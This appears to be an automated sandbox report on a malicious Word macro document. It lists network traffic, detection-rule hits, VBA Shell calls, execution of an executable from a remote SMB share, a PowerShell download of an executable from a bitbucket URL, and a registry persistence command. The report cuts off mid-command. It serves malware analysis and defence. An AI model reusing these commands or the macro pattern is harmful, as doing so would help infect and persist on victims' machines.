Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 104.192.141.1:443 -> 192.168.2.22:49164
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.192.141.1:443
Source: winword.exe | Memory has grown: Private usage: 0MB later: 58MB

Networking

Source: Joe Sandbox View | IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected:
  GET /olegovich-007/777/downloads/wsuscr.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
  Host: bitbucket.org
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B8B30889-A67A-4198-8B3E-84A745ECA427}.tmp
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: bitbucket.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bitbucket.org
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000B.00000002.391188462.000000001A5E3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 0000000B.00000002.385447053.0000000003843000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.co
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
Source: powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.374553660.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4AF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccl
Source: explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000E.00000002.632976759.000000000266A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner)
Source: explorer.exe, 0000000E.00000002.633272083.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.632976759.0000000002580000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000E.00000002.633066156.0000000003C29000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/7ea556d7-c0f5-4b27-9352-362ff0b0d6cb/downloads/2850b0f6-002e-
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C13000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C9D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/o
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002B5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/olegovich-007/777/downloads/wsuscr.exe
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: powershell.exe, 00000005.00000002.376805682.0000000012341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.374553660.0000000002519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 0000000B.00000002.391663210.000000001C4FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.391663210.000000001C491000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: powershell.exe, 0000000B.00000002.385447053.0000000002C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.385447053.0000000002C64000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000E.00000002.632856147.00000000001AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164

System Summary

Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 42#U0430.docOLE, VBA macro line: Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)
Source: 42#U0430.docOLE, VBA macro line: Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)
Source: 42#U0430.docOLE, VBA macro line: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE, VBA macro line: JbxHook_Shell_2_ = Shell(jbxparam0, jbxparam1)
Source: 42#U0430.docOLE, VBA macro line: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function RunExecutable, String powershell: Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)Name: RunExecutable
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6012
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6012Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895F00DD11_2_000007FE895F00DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_000007FE895F243911_2_000007FE895F2439
Source: 42#U0430.docOLE, VBA macro line: Private Sub Document_Open()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: 42#U0430.docOLE indicator, VBA macros: true
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF23BD85EE3DE97CB5.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: test2.exe.4.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 506 bytes, 1 file, at 0x2c +A "test2.bat", ID 855, number 1, 1 datablock, 0x1503 compression
Source: test2.exe.10.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 506 bytes, 1 file, at 0x2c +A "test2.bat", ID 855, number 1, 1 datablock, 0x1503 compression
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
Source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: explorer.exe, 0000000E.00000002.633066156.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBPB
Source: classification engine | Classification label: mal100.spyw.expl.evad.winDOC@27/19@6/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$#U0430.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR63C1.tmp
Source: 42#U0430.doc | OLE indicator, Word Document stream: true
Source: 42#U0430.doc | OLE document summary: title field not present or empty
Source: 42#U0430.doc | OLE document summary: edited time not present or 0
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{86B60DB8-C5A6-4CF4-9CD7-DD3E39FA8B35}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~DF23BD85EE3DE97CB5.TMP.0.dr | OLE document summary: title field not present or empty
Source: ~DF23BD85EE3DE97CB5.TMP.0.dr | OLE document summary: author field not present or empty
Source: ~DF23BD85EE3DE97CB5.TMP.0.dr | OLE document summary: edited time not present or 0
Source: \Device\Mup\89.23.98.22\LN\GB.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exe
Source: C:\Windows\System32\cmd.exe | Console Write: ..........................................................................,..3..8.................H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ...................................................J.......................................J.... ..J....................Z..................J....
Source: C:\Windows\System32\cmd.exe | Console Write: ................................e.c.h.o.........|..J.......................J............. ......`{.J..............(.............X%.J............
Source: C:\Windows\System32\cmd.exe | Console Write: ................................ .f. . ...................................,..3..e.c.h.o..........=H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................................ .|. ............=H.....................$.,..3...................=H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................................x.c.o.p.y........=H.....................$.,..3...................=H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ..........................................................................,..3..x.c.o.p..........=H.............................................
Source: C:\Windows\System32\cmd.exe | Console Write: ................................1.>.......................................,..3...................=H.............h.(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................................N.U.L. ...................................,..3...................=H.............h.(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: .................................................1.w....................t.,..3..B................=H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................\...............................%.. ......................,..3....................H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................\..................................J.......................................J.... ..J....................Z..................J....
Source: C:\Windows\System32\cmd.exe | Console Write: ................\...............p.o.w.e.r.s.h.e.l.l.......................(......$.J............/...............(.(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ................\.......................................................t.,..3..p.o.w.e..........=H.............................................
Source: C:\Windows\System32\cmd.exe | Console Write: ................\.......................................................t.,..3..p.o.w.e..........=H...............(.............................
Source: C:\Windows\System32\cmd.exe | Console Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d.......(.......(.....h.(.....B.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(..............P................&.......&.....}..w.............................1......(.P..............3........(.............@.a.............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm................'.......`k....}..w....@.a.....\.......................(.P.....................x.'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm................'.......`k....}..w....@.a.....\.......................(.P.....................x.'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8.9.....^.`k......u.....(.P.......................'.....$.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......u.....(.P.......................'.....,.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k......u.....(.P.......................(.....l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......@.a.....}..w..............Y.....^.`k......u.....(.P.......................'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm................'.....N.`k....}..w....@.a.....\.......................(.P.......................'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.2.7. .c.h.a.r.:.1.Y.......`k.....Mn.....(.P.....................h.'.....".......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................Cm................'.....N.`k....}..w....@.a.....\.......................(.P.......................'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.....b.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.......`k.....Mn.....(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ . . .l.l...C.o.m.m.a.n.d.s...I.n.v.o.k.e.W.e.b.R.e.q.u.e.s.t.C.o.m.m.a.n.d.....h.'.....L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......@.a.....}..w..............Y.......`k.....Mn.....(.P.....................h.'.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....j.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...Y.....^.`k.....N......(.P.......................'..... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....V.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....V.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....T.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ..(.....................................@.a.....}..w..............Y.....^.`k.....N......(.P.......................(.....l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................ .......@.a.....}..w..............Y.....^.`k.....N......(.P.......................'.............................
Source: C:\Windows\System32\reg.exe | Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......(...............
Source: C:\Windows\System32\reg.exe | Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Windows\System32\reg.exe | Console Write: ................l...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Windows\System32\reg.exe | Console Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.................N.......(...............
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: unknown | Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\explorer.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: 42#U0430.doc | Virustotal: Detection: 41%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\explorer.exe explorer.exe "\\89.23.98.22\LN\"
Source: unknown | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: \Device\Mup\89.23.98.22\LN\GB.exe \\89.23.98.22\LN\GB.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command Stop-Process -Name explorer
Source: \Device\Mup\89.23.98.22\LN\GB.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c res.bat && test2.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo f "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\xcopy.exe xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command 